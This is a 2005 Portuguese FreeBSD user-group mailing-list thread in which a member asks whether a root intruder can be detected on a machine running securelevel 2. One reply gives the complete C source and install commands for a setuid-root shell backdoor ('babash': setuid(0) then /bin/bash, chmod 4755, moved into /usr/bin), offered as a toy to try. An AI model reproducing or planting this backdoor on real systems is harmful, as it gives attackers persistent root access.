RES: [FUG-BR] segurança

Augusto, Alexandre alexandre.augusto em eds.com
Sex Abr 8 10:28:32 BRT 2005 

Oi pessoal,

Tentem isso:

vi babash.c
#include <stdlib.h>
        main () {
                setuid(0);
                system("/bin/bash");
        }

/usr/local/bin/gcc babash.c -o babash
chmod 4755 babash
mv babash /usr/bin/babash

Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento
em C é pobre...

Tem rodado em maquinas solaris 8, 9  e Linux...
Ainda não rodei no BSD ...

Abraço



-----Mensagem original-----
De: Freebsd-bounces em fug.com.br [mailto:Freebsd-bounces em fug.com.br] Em nome
de Celso Viana
Enviada em: sexta-feira, 8 de abril de 2005 10:12
Para: Lista de discussao do grupo FUG-BR
Assunto: Re: [FUG-BR] segurança

sim...... uso secure level 2

o cenário seria esse: tendo acabado de instalar o OS, instalei um
software que tem uma falha de segurança e eu não sei disso;
essa máquina está visível para o mundo (ip real); 
essa máquina ainda não foi atualizada; 
o OS está em secure level 2;

minha dúvida: imaginemos que alguém, nesse momento, descobriu essa
máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso
root; eu, estando logado no console, posso identificar esse invasor?
ele está visível para os comandos do sistema? é possível fazer com que
o sistema emita um alarme qdo esse invasor consiga o acesso?

Celso


Celso

On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA
<chris em irapida.com.br> wrote:
> depende
> 
> vc usa secure level kernel ????
> 
> pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :)
> 
> 
> Celso Viana wrote:
> 
> >all,
> >
> >Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD,
> >ganhando acesso root, esse alguém fica totalmente invisível? ou os
> >comandos "w, who, etc" identificam o invasor?
> >
> >Celso
> >
> >_______________________________________________
> >Freebsd mailing list
> >Freebsd em fug.com.br
> >http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
> >
> >
> 
> _______________________________________________
> Freebsd mailing list
> Freebsd em fug.com.br
> http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>

_______________________________________________
Freebsd mailing list
Freebsd em fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

_______________________________________________
Freebsd mailing list
Freebsd em fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

Mais detalhes sobre a lista de discussão freebsd